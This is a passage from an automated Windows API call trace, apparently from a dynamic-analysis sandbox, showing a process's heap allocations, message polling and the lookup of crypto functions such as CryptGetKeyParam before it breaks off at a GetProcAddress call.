dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.285] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0185.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0185.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0185.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0185.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.285] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.286] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0185.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0185.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.287] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0185.288] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.288] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0185.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0185.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0185.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.293] GetProcAddress (hModule=0x74f20000, 